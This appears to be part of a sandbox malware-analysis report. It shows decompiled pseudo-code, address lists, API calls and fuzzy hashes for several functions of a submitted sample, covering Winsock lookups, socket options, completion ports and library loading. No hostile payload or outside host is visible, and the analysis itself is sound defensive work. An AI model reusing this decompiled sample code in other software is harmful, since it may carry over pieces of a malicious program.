					_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t137[0x10] + 0xc)) + 8));
					_push( &_v56);
					_t140 = E00401E20(0x2c);
					 *(_t140 + 0x14) = 0;
					 *((intOrPtr*)(_t140 + 0x18)) = E00411790;
					_t140->Internal = 0;
					_t140->InternalHigh = 0;
					_t140->Offset = 0;
					_t140->OffsetHigh = 0;
					_t140->hEvent = 0;
					 *(_t140 + 0x1c) = 0;
					asm("movq xmm0, [ebp-0x2c]");
					asm("movq [esi+0x20], xmm0");
					 *(_t140 + 0x28) = _v48;
					asm("lock inc dword [edi+0x18]");
					 *(_t140 + 0x1c) = 1;
					if(PostQueuedCompletionStatus( *(_t135 + 0x14), 0, 0, _t140) == 0) {
						EnterCriticalSection(_t135 + 0x38);
						 *(_t140 + 0x14) = 0;
						_t112 =  *(_t135 + 0x58);
						if(_t112 == 0) {
							 *(_t135 + 0x54) = _t140;
						} else {
							 *(_t112 + 0x14) = _t140;
						}
						 *(_t135 + 0x58) = _t140;
						 *(_t135 + 0x34) = 1;
						_t94 = _t135 + 0x38;
						LeaveCriticalSection(_t135 + 0x38);
					}
					goto L10;
				}
			}

0x00410ba1
0x00410bb0
0x00410bb4
0x00410bb6
0x00410bb8
0x00410bc3
0x00410bc4
0x00410bc8
0x00410bcd
0x00410bcf
0x00410bd4
0x00410bd8
0x00410bde
0x00410be0
0x00410be9
0x00410bec
0x00410d5c
0x00410d5f
0x00410d67
0x00410d6a
0x00410d6d
0x00410d70
0x00410d78
0x00410d7d
0x00410d80
0x00410d89
0x00410d90
0x00410d97
0x00410d9d
0x00410da4
0x00410dab
0x00410db2
0x00410db9
0x00410dc0
0x00410dc7
0x00410dcf
0x00410dd4
0x00410dd7
0x00410dde
0x00410de5
0x00410de8
0x00410def
0x00410dfc
0x00410dff
0x00410e13
0x00410e18
0x00410e1b
0x00410e23
0x00410e24
0x00410e35
0x00410e35
0x00410bf2
0x00410bfe
0x00410c17
0x00410c28
0x00410c30
0x00410c32
0x00410c35
0x00410c3c
0x00410c41
0x00410c46
0x00410c4d
0x00410c51
0x00410c54
0x00410c58
0x00410c5c
0x00410c61
0x00410c66
0x00410c66
0x00410c6d
0x00410c70
0x00410c79
0x00410c7c
0x00410c7e
0x00000000
0x00410c84
0x00410c87
0x00410c8c
0x00410c8f
0x00410c97
0x00410c9d
0x00410ca5
0x00410cab
0x00410cb3
0x00410cb8
0x00410cbf
0x00410cc6
0x00410ccc
0x00410cd3
0x00410cda
0x00410ce1
0x00410ce8
0x00410cef
0x00410cf4
0x00410cfc
0x00410cff
0x00410d08
0x00410d1a
0x00410d24
0x00410d2a
0x00410d31
0x00410d36
0x00410d3d
0x00410d38
0x00410d38
0x00410d38
0x00410d40
0x00410d4b
0x00410d4d
0x00410d51
0x00410d51
0x00000000
0x00410d1a

APIs

PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00410D12
EnterCriticalSection.KERNEL32(?), ref: 00410D24
LeaveCriticalSection.KERNEL32(?), ref: 00410D51

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$CompletionEnterLeavePostQueuedStatus
String ID:
API String ID: 2946045947-0
Opcode ID: a4248a4ab6a64db7c742c59f95df8cc29bd808e719708ea7dd513d6c3ce2d61b
Instruction ID: fec89a31d6bf40eac1126fa1aa62c4cf70ceb5728024cd795431cb173619d438
Opcode Fuzzy Hash: a4248a4ab6a64db7c742c59f95df8cc29bd808e719708ea7dd513d6c3ce2d61b
Instruction Fuzzy Hash: 028108B09007099FDB10CF95C984B9ABBF4FF48314F14862AE945AB780D7B9A994CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 00411660 Relevance: 4.6, APIs: 3, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00411660(void* __edx, intOrPtr _a4, char _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr* _t31;
				intOrPtr* _t35;
				void* _t36;
				char _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				signed int _t52;
				void* _t55;

				_t41 = __edx;
				_t51 = (_t49 & 0xfffffff8) - 0x14;
				_t22 =  *0x41b014; // 0x149e0abf
				_v8 = _t22 ^ _t51;
				_t24 = _a12;
				_t37 = _a8;
				_t35 =  *((intOrPtr*)(_t24 + 4));
				_t43 =  *_t24;
				_v24 = _t37;
				if(_a4 == 0) {
					L18:
					_v16 = _t43;
					_v12 = _t35;
					_v20 =  *((intOrPtr*)(_v24 + 0x38));
					_push( &_v20);
					_t27 = E00401E90(_v24, 0x3c);
					_t52 = _t51 + 0xc;
					if(_a4 != 0) {
						_push( &_v20);
						_t30 = E004117F0( &_v20);
						_t52 = _t52 + 8;
						_t19 =  &_v24;
						_t27 =  *_t19;
						 *_t19 = _t30;
					}
					_pop(_t44);
					_pop(_t46);
					_pop(_t36);
					return E00412A1E(_t27, _t36, _v8 ^ _t52, _t41, _t44, _t46);
				}
				if( *((char*)(_t37 + 0x34)) == 0) {
					_t43 =  *((intOrPtr*)(_t37 + 0x20));
					_t35 =  *((intOrPtr*)(_t37 + 0x24));
					goto L18;
				}
				_t47 =  *((intOrPtr*)(_t37 + 0x30));
				_t55 = _t43 - 0x4cf;
				if(_t55 > 0) {
					if(_t43 != 0x4d0) {
						L12:
						if(_t43 == 0) {
							if(_t47 != 0xffffffff) {
								__imp__#112(0);
								__imp__#21(_t47, 0xffff, 0x7010, 0, 0); // executed
								_t31 = E00412970();
								_t35 = _t31;
								__imp__#111();
								_t43 = _t31;
								if(_t24 == 0) {
									_t43 = 0;
									_t35 = E00412970();
								}
							} else {
								_t43 = 0x2719;
								_t35 = E00412970();
							}
						}
						goto L18;
					}
					_t43 = 0x2751;
					L11:
					_t24 = E00412970();
					_t35 = _t24;
					goto L12;
				}
				if(_t55 == 0) {
					_t43 = 0x2743;
					goto L11;
				}
				if(_t43 == 0x79) {
					_t43 = 0x274c;
					goto L11;
				}
				if(_t43 != 0x4c9) {
					goto L12;
				} else {
					_t43 = 0x274d;
					goto L11;
				}
			}

0x00411660
0x00411666
0x00411669
0x00411670
0x00411678
0x0041167b
0x00411680
0x00411684
0x00411686
0x0041168a
0x00411737
0x0041173b
0x0041173f
0x00411746
0x0041174e
0x00411752
0x00411757
0x0041175e
0x00411764
0x00411766
0x0041176b
0x0041176e
0x0041176e
0x0041176e
0x0041176e
0x00411776
0x00411777
0x00411778
0x00411783
0x00411783
0x00411694
0x00411731
0x00411734
0x00000000
0x00411734
0x0041169a
0x0041169d
0x004116a3
0x004116cf
0x004116dd
0x004116df
0x004116e4
0x004116f6
0x0041170b
0x00411713
0x00411718
0x0041171a
0x00411720
0x00411724
0x00411726
0x0041172d
0x0041172d
0x004116e6
0x004116e6
0x004116f0
0x004116f0
0x004116e4
0x00000000
0x004116df
0x004116d1
0x004116d6
0x004116d6
0x004116db
0x00000000
0x004116db
0x004116a5
0x004116c2
0x00000000
0x004116c2
0x004116aa
0x004116bb
0x00000000
0x004116bb
0x004116b2
0x00000000
0x004116b4
0x004116b4
0x00000000
0x004116b4

APIs

WSASetLastError.WS2_32(00000000), ref: 004116F6
setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 0041170B
WSAGetLastError.WS2_32 ref: 0041171A

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$setsockopt
String ID:
API String ID: 3136324617-0
Opcode ID: 40b93b31437c6f0237cd2e074636542568ede16f53dc9d0b9a4669e3f7c34fe9
Instruction ID: 583bb1bb060e2b3ee883795698c8550054b4645f09b3d19375f0a9e4f992f29f
Opcode Fuzzy Hash: 40b93b31437c6f0237cd2e074636542568ede16f53dc9d0b9a4669e3f7c34fe9
Instruction Fuzzy Hash: 6431F672B043019BD710EB28C84479A7394AB88314F19453FEBA98B3E1D778DC818B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00403370 Relevance: 4.6, APIs: 3, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00403370(void* __eax, intOrPtr* __ecx, char* __edx, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _t7;
				intOrPtr _t8;
				intOrPtr* _t9;
				intOrPtr _t11;
				intOrPtr* _t13;
				char* _t18;
				intOrPtr _t19;
				char* _t22;
				intOrPtr _t23;
				void* _t33;
				void* _t34;

				_t7 = __eax;
				_push(__ecx);
				_t18 = __edx;
				_t13 = __ecx;
				if(__edx == 0 ||  *__edx == 0) {
					_t18 = 0;
				}
				_t22 = _a4;
				if(_t22 == 0 ||  *_t22 == 0) {
					_t22 = 0;
				}
				__imp__#112(0);
				__imp__getaddrinfo(_t18, _t22, _a8, _a12); // executed
				_t33 = _t7 - 0x273f;
				if(_t33 > 0) {
					__eflags = _t7 - 0x2afa;
					if(__eflags > 0) {
						__eflags = _t7 - 0x2afb;
						if(_t7 == 0x2afb) {
							_t8 = E00412970();
							_t23 = 0x2afb;
							goto L28;
						} else {
							goto L26;
						}
					} else {
						if(__eflags == 0) {
							_t8 = E00412970();
							_t23 = 0x2afa;
							goto L28;
						} else {
							__eflags = _t7 - 0x277d;
							if(_t7 == 0x277d) {
								_t8 = E00412970();
								_t23 = 0x277d;
								goto L28;
							} else {
								__eflags = _t7 - 0x2af9;
								if(_t7 != 0x2af9) {
									goto L26;
								} else {
									_t8 = E00412970();
									_t23 = 0x2af9;
									goto L28;
								}
							}
						}
					}
				} else {
					if(_t33 == 0) {
						_t8 = E00412970();
						_t23 = 0x273f;
						goto L28;
					} else {
						_t34 = _t7 - 0x2726;
						if(_t34 > 0) {
							__eflags = _t7 - 0x273c;
							if(_t7 != 0x273c) {
								goto L26;
							} else {
								_t8 = E00412970();
								_t23 = 0x273c;
								goto L28;
							}
						} else {
							if(_t34 == 0) {
								_t8 = E00412970();
								_t23 = 0x2726;
								goto L28;
							} else {
								if(_t7 == 0) {
									_t23 = 0;
									_t8 = E00412970();
									goto L28;
								} else {
									if(_t7 != 8) {
										L26:
										_t11 = E00412970();
										_t19 = _t11;
										__imp__#111();
										_t23 = _t11;
									} else {
										_t8 = E00412970();
										_t23 = 0xe;
										L28:
										_t19 = _t8;
									}
								}
							}
						}
					}
				}
				_t9 = _a16;
				 *((intOrPtr*)(_t13 + 4)) = _t19;
				 *_t13 = _t23;
				 *((intOrPtr*)(_t9 + 4)) = _t19;
				 *_t9 = _t23;
				return _t13;
			}

0x00403370
0x00403376
0x0040337a
0x0040337c
0x00403380
0x00403387
0x00403387
0x00403389
0x0040338e
0x00403395
0x00403395
0x00403399
0x004033a7
0x004033ad
0x004033b2
0x00403412
0x00403417
0x0040344d
0x00403452
0x00403465
0x0040346a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403419
0x00403419
0x00403441
0x00403446
0x00000000
0x0040341b
0x0040341b
0x00403420
0x00403435
0x0040343a
0x00000000
0x00403422
0x00403422
0x00403427
0x00000000
0x00403429
0x00403429
0x0040342e
0x00000000
0x0040342e
0x00403427
0x00403420
0x00403419
0x004033b4
0x004033b4
0x00403406
0x0040340b
0x00000000
0x004033b6
0x004033b6
0x004033bb
0x004033f3
0x004033f8
0x00000000
0x004033fa
0x004033fa
0x004033ff
0x00000000
0x004033ff
0x004033bd
0x004033bd
0x004033e7
0x004033ec
0x00000000
0x004033bf
0x004033c1
0x004033db
0x004033dd
0x00000000
0x004033c3
0x004033c6
0x00403454
0x00403454
0x00403459
0x0040345b
0x00403461
0x004033cc
0x004033cc
0x004033d1
0x0040346f
0x0040346f
0x0040346f
0x004033c6
0x004033c1
0x004033bd
0x004033bb
0x004033b4
0x00403471
0x00403474
0x00403477
0x00403479
0x0040347d
0x00403486

APIs

WSASetLastError.WS2_32(00000000), ref: 00403399
getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 004033A7

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLastgetaddrinfo
String ID:
API String ID: 4160901379-0
Opcode ID: b37e562f0f0e768a67d216c9976dc6e5f547b9078680e080654617885711be18
Instruction ID: ce5aca55bdc2d8d3f9713a3157accc20c3fa9c292bc866cad375e4b78f6eb581
Opcode Fuzzy Hash: b37e562f0f0e768a67d216c9976dc6e5f547b9078680e080654617885711be18
Instruction Fuzzy Hash: 6321E536E141508BDB322EADC54829B6D4C9B41366F19007BEC49FB3D1C9BC8E812A9F

Uniqueness

Uniqueness Score: -1.00%

Function 004105F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E004105F0(intOrPtr* _a4, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				char _v100;
				intOrPtr* _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t99;
				signed int _t102;
				intOrPtr _t113;
				signed int _t118;
				intOrPtr _t125;
				signed int _t130;
				signed int _t131;
				void* _t132;
				signed int _t133;
				intOrPtr* _t143;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t158;
				void* _t160;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t165;
				char _t168;
				void* _t169;
				signed int _t170;
				void* _t171;
				void* _t173;

				_push(0xffffffff);
				_push(0x414b30);
				_push( *[fs:0x0]);
				_t83 =  *0x41b014; // 0x149e0abf
				_t84 = _t83 ^ _t170;
				_v20 = _t84;
				_push(_t84);
				 *[fs:0x0] =  &_v16;
				_t167 = _a12;
				_t162 = _a4;
				_t129 = _a16;
				_v40 = 0;
				_t8 = _t167 + 0x38; // 0x38
				_v76 = _t162;
				_v44 = _t162;
				_v36 = 0;
				_v72 = _t8;
				E0040C5D0(_a16,  &_v100, _t8);
				_t13 = _t167 + 0x20; // 0x20
				_v8 = 0;
				_v44 = _t13;
				E0040C5D0(_a16,  &_v68, _t13);
				_v40 = 0x60;
				_t91 =  >=  ? _v100 :  &_v100;
				_t157 =  >=  ? _v68 :  &_v68;
				E00403370( >=  ? _v100 :  &_v100,  &_v28,  >=  ? _v68 :  &_v68,  >=  ? _v100 :  &_v100, _a12,  &_v36, _a16); // executed
				_t158 = _v48;
				_t173 = _t171 - 0x60 + 0x10;
				if(_t158 < 0x10) {
					L4:
					_v8 = 0xffffffff;
					_t159 = _v80;
					_v52 = 0;
					_v48 = 0xf;
					_v68 = 0;
					if(_t159 < 0x10) {
						L9:
						_t168 = _v36;
						_v24 = _t168;
						_v8 = 1;
						_t94 =  ==  ? 0 : E00401790;
						_t184 =  ==  ? 0 : E00401790;
						if(( ==  ? 0 : E00401790) == 0) {
							E0040C5D0(_t129,  &_v68, _v72);
							_v8 = 3;
							_v40 = 0xe2;
							E0040C5D0(_t129,  &_v100, _v44);
							_v8 = 4;
							_t159 = _v36;
							_v40 = 0x1e6;
							_t99 = E004108C0(_t129,  &_v112, _v36,  &_v100,  &_v68);
							_t173 = _t173 + 8;
							_t143 = _t99;
							_t130 = 0x1ee;
						} else {
							_v32 = 0;
							_v28 = 0;
							_v24 = 0;
							_t143 =  &_v32;
							_t130 = 0x61;
						}
						 *_t162 = 0;
						_t131 = _t130 | 0x00000010;
						 *((intOrPtr*)(_t162 + 4)) = 0;
						 *_t162 =  *_t143;
						 *((intOrPtr*)(_t162 + 4)) =  *((intOrPtr*)(_t143 + 4));
						 *_t143 = 0;
						 *((intOrPtr*)(_t143 + 4)) = 0;
						_t102 =  *(_t143 + 8);
						 *(_t162 + 8) = _t102;
						if((_t131 & 0x00000008) != 0) {
							_t165 = _v108;
							_t131 = _t131 & 0xfffffff7;
							if(_t165 != 0) {
								asm("lock xadd [edi+0x4], eax");
								if((_t102 | 0xffffffff) == 0) {
									_t118 =  *((intOrPtr*)( *_t165))();
									asm("lock xadd [edi+0x8], eax");
									if((_t118 | 0xffffffff) == 0) {
										 *((intOrPtr*)( *_t165 + 4))();
									}
								}
							}
						}
						if((_t131 & 0x00000004) == 0) {
							L22:
							if((_t131 & 0x00000002) == 0) {
								L28:
								if((_t131 & 0x00000001) != 0) {
									_t164 = _v28;
									if(_t164 != 0) {
										_t133 = _t131 | 0xffffffff;
										asm("lock xadd [edi+0x4], eax");
										if(_t133 == 0) {
											 *((intOrPtr*)( *_t164))();
											asm("lock xadd [edi+0x8], ebx");
											if(_t133 == 1) {
												 *((intOrPtr*)( *_t164 + 4))();
											}
										}
									}
								}
								if(_t168 != 0) {
									__imp__freeaddrinfo(_t168);
								}
								 *[fs:0x0] = _v16;
								_pop(_t163);
								_pop(_t169);
								_pop(_t132);
								return E00412A1E(_v76, _t132, _v20 ^ _t170, _t159, _t163, _t169);
							}
							_t159 = _v48;
							_t131 = _t131 & 0xfffffffd;
							if(_t159 < 0x10) {
								goto L28;
							}
							_t150 = _v68;
							_t159 = _t159 + 1;
							_t110 = _t150;
							if(_t159 < 0x1000) {
								L27:
								_push(_t159);
								E00412FD5(_t110, _t150);
								goto L28;
							}
							_t150 =  *((intOrPtr*)(_t150 - 4));
							_t159 = _t159 + 0x23;
							if(_t110 <= 0x1f) {
								goto L27;
							}
							L26:
							__imp___invalid_parameter_noinfo_noreturn();
							goto L27;
						}
						_t159 = _v80;
						_t131 = _t131 & 0xfffffffb;
						if(_t159 < 0x10) {
							goto L22;
						}
						_t151 = _v100;
						_t159 = _t159 + 1;
						_t113 = _t151;
						if(_t159 < 0x1000) {
							L21:
							_push(_t159);
							E00412FD5(_t113, _t151);
							_t173 = _t173 + 8;
							goto L22;
						}
						_t150 =  *((intOrPtr*)(_t151 - 4));
						_t159 = _t159 + 0x23;
						_t110 = _t113 - _t150 + 0xfffffffc;
						if(_t113 - _t150 + 0xfffffffc > 0x1f) {
							goto L26;
						}
						goto L21;
					}
					_t154 = _v100;
					_t159 = _t159 + 1;
					_t122 = _t154;
					if(_t159 < 0x1000) {
						L8:
						_push(_t159);
						E00412FD5(_t122, _t154);
						_t173 = _t173 + 8;
						goto L9;
					}
					_t154 =  *((intOrPtr*)(_t154 - 4));
					_t159 = _t159 + 0x23;
					if(_t122 <= 0x1f) {
						goto L8;
					}
					L7:
					__imp___invalid_parameter_noinfo_noreturn();
					goto L8;
				}
				_t155 = _v68;
				_t160 = _t158 + 1;
				_t125 = _t155;
				if(_t160 < 0x1000) {
					L3:
					_push(_t160);
					E00412FD5(_t125, _t155);
					_t173 = _t173 + 8;
					goto L4;
				}
				_t154 =  *((intOrPtr*)(_t155 - 4));
				_t159 = _t160 + 0x23;
				_t122 = _t125 - _t154 + 0xfffffffc;
				if(_t125 - _t154 + 0xfffffffc > 0x1f) {
					goto L7;
				}
				goto L3;
			}

0x004105f3
0x004105f5
0x00410600
0x00410604
0x00410609
0x0041060b
0x00410611
0x00410615
0x0041061b
0x00410621
0x00410624
0x00410627
0x0041062e
0x00410631
0x00410635
0x00410638
0x0041063f
0x00410642
0x00410647
0x0041064a
0x00410655
0x00410658
0x00410669
0x00410670
0x0041067f
0x00410684
0x00410689
0x0041068c
0x00410692
0x004106bc
0x004106bc
0x004106c3
0x004106c6
0x004106cd
0x004106d4
0x004106db
0x0041070b
0x0041070b
0x0041070e
0x00410713
0x00410721
0x00410724
0x00410726
0x00410741
0x00410749
0x00410753
0x0041075a
0x00410762
0x00410769
0x00410773
0x0041077b
0x00410780
0x00410783
0x00410785
0x00410728
0x00410728
0x0041072b
0x0041072e
0x00410731
0x00410734
0x00410734
0x0041078a
0x00410790
0x00410793
0x0041079c
0x004107a1
0x004107a4
0x004107aa
0x004107b1
0x004107b4
0x004107ba
0x004107bc
0x004107bf
0x004107c4
0x004107c9
0x004107ce
0x004107d4
0x004107d9
0x004107de
0x004107e4
0x004107e4
0x004107de
0x004107ce
0x004107c4
0x004107ea
0x0041081f
0x00410822
0x0041085d
0x00410860
0x00410862
0x00410867
0x00410869
0x0041086e
0x00410873
0x00410879
0x0041087b
0x00410881
0x00410887
0x00410887
0x00410881
0x00410873
0x00410867
0x0041088c
0x0041088f
0x0041088f
0x0041089b
0x004108a3
0x004108a4
0x004108a5
0x004108b3
0x004108b3
0x00410824
0x00410827
0x0041082d
0x00000000
0x00000000
0x0041082f
0x00410832
0x00410833
0x0041083b
0x00410853
0x00410853
0x00410855
0x00000000
0x0041085a
0x0041083d
0x00410840
0x0041084b
0x00000000
0x00000000
0x0041084d
0x0041084d
0x00000000
0x0041084d
0x004107ec
0x004107ef
0x004107f5
0x00000000
0x00000000
0x004107f7
0x004107fa
0x004107fb
0x00410803
0x00410815
0x00410815
0x00410817
0x0041081c
0x00000000
0x0041081c
0x00410805
0x00410808
0x0041080d
0x00410813
0x00000000
0x00000000
0x00000000
0x00410813
0x004106dd
0x004106e0
0x004106e1
0x004106e9
0x00410701
0x00410701
0x00410703
0x00410708
0x00000000
0x00410708
0x004106eb
0x004106ee
0x004106f9
0x00000000
0x00000000
0x004106fb
0x004106fb
0x00000000
0x004106fb
0x00410694
0x00410697
0x00410698
0x004106a0
0x004106b2
0x004106b2
0x004106b4
0x004106b9
0x00000000
0x004106b9
0x004106a2
0x004106a5
0x004106aa
0x004106b0
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00403370: WSASetLastError.WS2_32(00000000), ref: 00403399
Part of subcall function 00403370: getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 004033A7

FreeAddrInfoW.WS2_32(00000000), ref: 0041088F

Strings

`, xrefs: 00410669

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: AddrErrorFreeInfoLastgetaddrinfo
String ID: `
API String ID: 3749425351-2679148245
Opcode ID: 492be172e9c91fbbfa98c04403ab92287b17ffee0e60bb51749a59da18d8c2ef
Instruction ID: 6b6202c5d95bbdf00d7c86f0b556390aa99e07718eb048b6f1579ab17ad89b63
Opcode Fuzzy Hash: 492be172e9c91fbbfa98c04403ab92287b17ffee0e60bb51749a59da18d8c2ef
Instruction Fuzzy Hash: 45917071A00209DBDB14DFA8C984BDDB7B5FF45324F14821AE425A73D0D779A981CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00425C9E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004419C8), ref: 00425E5E

Strings

!h|A, xrefs: 00425CAD

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: LibraryLoad
String ID: !h|A
API String ID: 1029625771-1015882783
Opcode ID: 127a440d1ae7e49d2bae84f5421670f55835e8b4bd2fe2a65a755fb01acebafa
Instruction ID: 67abc060e6a5ca7ec520eb30de68b4f3a9054f85dba768eefbb671ad3884ffb1
Opcode Fuzzy Hash: 127a440d1ae7e49d2bae84f5421670f55835e8b4bd2fe2a65a755fb01acebafa
Instruction Fuzzy Hash: 7061F1B5900648EFEB019BA4ED88DAE7B7CFB05349F14446AF142A6171D7785E84CF38

Uniqueness

Uniqueness Score: -1.00%

Function 00405400 Relevance: 2.6, APIs: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00405400(void* __ecx, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				struct _CRITICAL_SECTION* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;
				signed int _t30;
				intOrPtr* _t39;
				void* _t40;
				struct _CRITICAL_SECTION* _t53;
				void* _t54;
				signed int _t55;
				intOrPtr* _t58;
				void* _t59;
				signed int _t61;

				_push(0xffffffff);
				_push(0x413f3d);
				_push( *[fs:0x0]);
				_t25 =  *0x41b014; // 0x149e0abf
				_t26 = _t25 ^ _t61;
				_v20 = _t26;
				_push(_t53);
				_push(_t26);
				 *[fs:0x0] =  &_v16;
				_t39 = _a4;
				if( *_t39 != 0xffffffff) {
					asm("lock cmpxchg [ecx], edx");
					_v32 = 0;
					if(0 != 0) {
						_t53 = 0x18;
						_v40 = _t53;
						EnterCriticalSection(_t53);
						_v36 = 1;
						_v8 = 0;
						_v24 = E00412970();
						_v28 = 0x3e3;
						E00404520(_v32,  *_t39,  &_v28);
						LeaveCriticalSection(_t53);
					}
				}
				_v28 = 0;
				_t28 = E00412970();
				_t51 = _t39 + 4;
				_v24 = _t28;
				_t30 = E00402FB0( *_t39, _t39 + 4, 1,  &_v28); // executed
				_t58 =  *((intOrPtr*)(_t39 + 0xc));
				 *_t39 = 0xffffffff;
				 *((char*)(_t39 + 4)) = 0;
				 *((intOrPtr*)(_t39 + 8)) = 0;
				 *((intOrPtr*)(_t39 + 0xc)) = 0;
				if(_t58 != 0) {
					_t55 = _t53 | 0xffffffff;
					_t30 = _t55;
					asm("lock xadd [esi+0x4], eax");
					if(_t55 == 0) {
						_t30 =  *((intOrPtr*)( *_t58))();
						asm("lock xadd [esi+0x8], edi");
						if(_t55 == 1) {
							_t30 =  *((intOrPtr*)( *_t58 + 4))();
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t54);
				_pop(_t59);
				_pop(_t40);
				return E00412A1E(_t30, _t40, _v20 ^ _t61, _t51, _t54, _t59);
			}

0x00405403
0x00405405
0x00405410
0x00405414
0x00405419
0x0040541b
0x00405420
0x00405421
0x00405425
0x0040542b
0x00405431
0x0040543a
0x0040543e
0x00405443
0x00405447
0x0040544b
0x0040544e
0x00405454
0x00405458
0x00405467
0x0040546f
0x00405476
0x0040547c
0x0040547c
0x00405443
0x00405482
0x00405489
0x00405490
0x00405493
0x0040549c
0x004054a1
0x004054a7
0x004054ad
0x004054b1
0x004054b8
0x004054c1
0x004054c3
0x004054c6
0x004054c8
0x004054cd
0x004054d3
0x004054d5
0x004054db
0x004054e1
0x004054e1
0x004054db
0x004054cd
0x004054e7
0x004054ef
0x004054f0
0x004054f1
0x004054ff

APIs

EnterCriticalSection.KERNEL32(00000018,149E0ABF,?,?), ref: 0040544E
LeaveCriticalSection.KERNEL32(00000018), ref: 0040547C

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0fe5f0f078799c8626ba45d0ad164c2ea413412d395ad920f6d375955e03df78
Instruction ID: 63ccc7509c24a13478ccf7ef5c15b706b93e7d9113b2fe1c35f641948c5a69ae
Opcode Fuzzy Hash: 0fe5f0f078799c8626ba45d0ad164c2ea413412d395ad920f6d375955e03df78
Instruction Fuzzy Hash: 6B31BA709006058FCB11DF59C984BAFBBB4EF48325F04826AE915AB3C1DB789A41CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004046F0 Relevance: 2.5, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004046F0(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t14;
				struct _CRITICAL_SECTION* _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;

				_push(__ecx);
				_t25 = _a4;
				_t22 = __ecx; // executed
				_t14 = E00405400(__ecx, _t25); // executed
				_t16 = __ecx + 0x10;
				EnterCriticalSection(_t16);
				if( *((intOrPtr*)(_t22 + 0x28)) == _t25) {
					_t14 =  *((intOrPtr*)(_t25 + 0x14));
					 *((intOrPtr*)(_t22 + 0x28)) = _t14;
				}
				_t19 =  *((intOrPtr*)(_t25 + 0x18));
				if(_t19 != 0) {
